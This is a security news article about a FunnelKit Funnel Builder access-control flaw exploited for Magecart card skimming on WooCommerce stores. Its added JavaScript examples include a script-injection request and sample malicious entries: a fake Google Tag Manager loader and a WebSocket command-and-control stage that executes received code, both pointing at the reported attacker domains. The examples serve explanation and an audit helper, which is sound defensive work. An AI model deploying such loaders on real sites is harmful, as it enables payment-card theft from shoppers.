Magecart Attack: Critical Flaw in FunnelKit Plugin Sparks Credit Card Skimming on 40,000+ WooCommerce Sites
Owners of WordPress e-commerce sites are under attack following the disclosure of a critical vulnerability in FunnelKit's Funnel Builder plugin. The flaw affects more than 40,000 WooCommerce storefronts, and threat actors are already exploiting it to steal customers' payment card data.
Researchers at Sansec report that the flaw lets any unauthenticated remote attacker inject malicious JavaScript directly into checkout pages. The attackers disguise the injected scripts as routine Google Tag Manager analytics code, so site administrators often overlook them among legitimate marketing tags.
Once a store is compromised, the rogue script loads on every payment page and silently captures card numbers, CVV codes, billing addresses and other personally identifiable information (PII) belonging to customers.
The defect affects all versions of Funnel Builder prior to 3.15.0.3. It lies in the public checkout interface, which allowed internal plugin methods to be invoked without any permission check. By abusing this, an attacker could modify FunnelKit's global settings directly and append arbitrary scripts to the External Scripts list.
FunnelKit has since released a fix. The patched version adds strict access-control checks together with an allowlist of the internal methods that may be invoked through the checkout interface.
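To make the flaw concrete, here is an added illustration in JavaScript (not FunnelKit's code; the plugin itself is written in PHP) of the pattern the advisory describes: a public checkout endpoint that dispatches to whatever internal method the request names, shown first without any authorization check and then with the two controls the fix is described as adding, a capability check and an allowlist of callable methods. The method names, settings keys, request shape, nonce handling and capability string are all hypothetical.

```javascript
// Added illustration, not FunnelKit's code: a checkout endpoint that lets the
// request name an internal plugin method. Everything named here (settings
// keys, method names, request shape, capability string) is hypothetical.

function createPlugin() {
  // Global plugin settings, including the External Scripts list that is
  // echoed into every checkout page.
  const settings = { externalScripts: [] };

  // Internal methods. getShippingRates is harmless for a visitor to call;
  // updateSettings must be reserved for administrators.
  const internal = {
    getShippingRates() {
      return { rates: ["flat_rate"] };
    },
    updateSettings(req) {
      Object.assign(settings, req.payload);
      return { ok: true };
    },
  };

  // Vulnerable: whatever `method` the (unauthenticated) request names is
  // looked up and called. Nothing stops a visitor from calling updateSettings.
  function vulnerableCheckoutHandler(req) {
    const fn = internal[req.method];
    if (typeof fn !== "function") throw new Error("unknown method");
    return fn(req);
  }

  // Hardened: only allowlisted public methods are reachable without
  // authorization; admin methods need a privileged user and a valid nonce.
  const PUBLIC_METHODS = new Set(["getShippingRates"]);
  const ADMIN_METHODS = new Set(["updateSettings"]);

  function hardenedCheckoutHandler(req, user) {
    const name = String(req.method);
    // Own-property check also rejects prototype names such as "constructor".
    if (!Object.prototype.hasOwnProperty.call(internal, name)) {
      throw new Error("unknown method");
    }
    if (PUBLIC_METHODS.has(name)) return internal[name](req);
    const isAdmin = user && user.capabilities.includes("manage_options");
    if (ADMIN_METHODS.has(name) && isAdmin && req.nonce === user.nonce) {
      return internal[name](req);
    }
    throw new Error("forbidden");
  }

  return { settings, vulnerableCheckoutHandler, hardenedCheckoutHandler };
}

// Constructed request: an anonymous visitor tries to append a script to the
// External Scripts list, the same end effect the attackers achieved. The
// hostname is the one reported in the article; the path is made up.
const injectScriptRequest = {
  method: "updateSettings",
  payload: { externalScripts: ["https://analytics-reports.com/gtm.js"] },
};

// Runs the same request against both handlers and reports the outcome.
function demonstrate() {
  const before = createPlugin();
  before.vulnerableCheckoutHandler(injectScriptRequest);

  const after = createPlugin();
  let blocked = false;
  try {
    after.hardenedCheckoutHandler(injectScriptRequest, null);
  } catch (e) {
    blocked = e.message === "forbidden";
  }
  return {
    injectedBeforeFix: before.settings.externalScripts.length, // 1
    injectedAfterFix: after.settings.externalScripts.length, // 0
    blocked, // true
  };
}
```

The allowlist is the important part: a capability check alone protects admin-only methods, but an explicit list of what the public endpoint may reach means a method added later is closed by default rather than exposed by default.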
During the investigation, researchers isolated a malicious payload posing as a Google Tag Manager loader. The script fetched an external file from the domain analytics-reports[.]com and then opened a WebSocket connection to a command-and-control server at protect-wss[.]com. Over this channel the compromised store received a custom skimmer tailored to the specific layout of the target site.
Impersonating Google tooling is a long-standing Magecart tactic. Auditors tend to skip over familiar-looking analytics scripts, which lets the malicious code persist undetected for long periods.
FunnelKit urges users to update the plugin immediately through the WordPress admin dashboard and to review Settings → Checkout → External Scripts, removing any unfamiliar or unexplained entries. Sansec also recommends a full malware and backdoor scan of the underlying server, since some of the affected stores may already be persistently compromised.
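As an added example of that audit step (not a tool from Sansec or FunnelKit), the following JavaScript scans exported External Scripts entries for the loader pattern described in this article: scripts that present themselves as Google Tag Manager but fetch from a non-Google host, open a WebSocket, or execute dynamically built code. The sample entries are constructed; the hostnames in the two malicious samples are the ones reported above (written undefanged so the URL parser accepts them; nothing is fetched), while the Google host allowlist and the heuristics are assumptions to be tuned for the tags a store actually uses.

```javascript
// Added audit helper, not from Sansec or FunnelKit. Scans External Scripts
// entries (as exported from the plugin settings) for the skimmer-loader
// pattern reported in the article. Allowlist and heuristics are assumptions.

const GOOGLE_TAG_HOSTS = ["googletagmanager.com", "google-analytics.com", "googleadservices.com"];

function isGoogleHost(hostname) {
  return GOOGLE_TAG_HOSTS.some((h) => hostname === h || hostname.endsWith("." + h));
}

// Pull every absolute or protocol-relative URL out of a script entry.
function extractUrls(entry) {
  const re = /(?:https?:|wss?:)?\/\/[A-Za-z0-9.-]+(?:\/[^\s'"<>)]*)?/g;
  const urls = [];
  for (const m of entry.match(re) || []) {
    try {
      urls.push(new URL(m.startsWith("//") ? "https:" + m : m));
    } catch {
      // unparsable fragment, skip it
    }
  }
  return urls;
}

function auditEntry(entry) {
  const findings = [];
  // Does the entry present itself as Google Tag Manager?
  const looksLikeGtm = /googletagmanager|gtm\.js|GTM-[A-Z0-9]{4,}|dataLayer/.test(entry);
  for (const u of extractUrls(entry)) {
    if (looksLikeGtm && !isGoogleHost(u.hostname)) {
      findings.push(`GTM-styled loader fetches from non-Google host ${u.hostname}`);
    }
    if (u.protocol === "ws:" || u.protocol === "wss:") {
      findings.push(`opens a WebSocket to ${u.hostname}`);
    }
  }
  // WebSocket built from a computed address that the URL regex cannot see.
  if (/new\s+WebSocket\s*\(/.test(entry) && !findings.some((f) => f.startsWith("opens a WebSocket"))) {
    findings.push("opens a WebSocket to a computed address");
  }
  if (/\beval\s*\(|new\s+Function\s*\(|\batob\s*\(/.test(entry)) {
    findings.push("executes or decodes dynamically built code");
  }
  return findings;
}

// Returns only the entries that produced findings, with their index in the list.
function auditExternalScripts(entries) {
  return entries
    .map((entry, index) => ({ index, findings: auditEntry(entry) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed samples: [0] the standard GTM snippet, [1] a lookalike loader
// pointed at the reported first-stage domain, [2] a second stage that opens
// the reported WebSocket C2 channel and runs whatever it receives.
const SAMPLE_ENTRIES = [
  "<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});" +
    "var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;" +
    "j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})" +
    "(window,document,'script','dataLayer','GTM-XXXXXX');</script>",
  "<script>(function(){var s=document.createElement('script');" +
    "s.src='https://analytics-reports.com/gtm.js?id=GTM-AB12CD';document.head.appendChild(s);})();</script>",
  "<script>var ws=new WebSocket('wss://protect-wss.com/socket');" +
    "ws.onmessage=function(e){(new Function(e.data))();};</script>",
];
```

A clean store should produce an empty report; anything flagged deserves a look at where the script came from and who added it, since a legitimate third-party tag will usually be recognisable by its vendor host.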